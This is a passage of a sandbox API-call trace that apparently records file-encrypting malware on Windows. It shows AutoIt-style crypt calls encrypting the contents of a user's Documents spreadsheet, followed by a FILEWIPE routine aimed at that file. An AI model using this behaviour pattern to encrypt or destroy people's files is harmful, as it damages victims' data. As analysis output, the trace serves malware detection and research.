wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0176.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0176.751] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0176.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0176.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0176.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0176.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.752] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.752] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.752] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0176.752] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.752] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.753] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.753] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.753] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.753] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.753] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.754] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x13c5c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x13c60) returned 1 [0176.754] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.754] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.754] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.754] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.754] CharLowerBuffW (in: lpsz="byte[80993]", cchLength=0xb | out: lpsz="byte[80993]") returned 0xb [0176.754] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.755] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.755] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.755] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa868d8*, pdwDataLen=0x87e820*=0x13c5c, dwBufLen=0x13c60 | out: pbData=0xa868d8*, pdwDataLen=0x87e820*=0x13c60) returned 1 [0176.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.756] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.756] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.756] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.092] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.092] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.092] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.092] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.092] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.092] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.092] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.104] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.104] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.104] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.108] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.108] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.108] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0177.109] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.109] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0177.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.109] CryptDestroyKey (hKey=0x90aed8) returned 1 [0177.113] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.113] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.113] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.113] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.113] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.113] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0177.113] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0177.113] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.113] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.113] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0177.114] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.114] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.114] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.114] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.114] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.114] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.114] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.114] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.114] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.114] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.114] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.114] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.114] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0177.114] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.114] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.114] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.114] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.114] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.115] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0177.115] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.115] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.115] FreeLibrary (hLibModule=0x74f20000) returned 1 [0177.115] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.115] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.115] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.115] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.116] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.116] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.116] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0177.116] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.118] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.xlsx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843dbca0, ftCreationTime.dwHighDateTime=0x1d59ce5, ftLastAccessTime.dwLowDateTime=0xe379aeb0, ftLastAccessTime.dwHighDateTime=0x1d59de2, ftLastWriteTime.dwLowDateTime=0xe379aeb0, ftLastWriteTime.dwHighDateTime=0x1d59de2, nFileSizeHigh=0x0, nFileSizeLow=0x13c5c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uKjh6aasKg.xlsx", cAlternateFileName="UKJH6A~1.XLS")) returned 0x90ae18 [0177.119] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0177.119] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0177.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0177.120] CharLowerBuffW (in: lpsz="byte[80988]", cchLength=0xb | out: lpsz="byte[80988]") returned 0xb [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0177.122] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.122] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0177.122] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0177.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0177.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0177.122] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0177.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.122] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2688 [0177.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2688, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0177.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0177.123] FreeLibrary (hLibModule=0x75c90000) returned 1 [0177.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0177.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0177.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 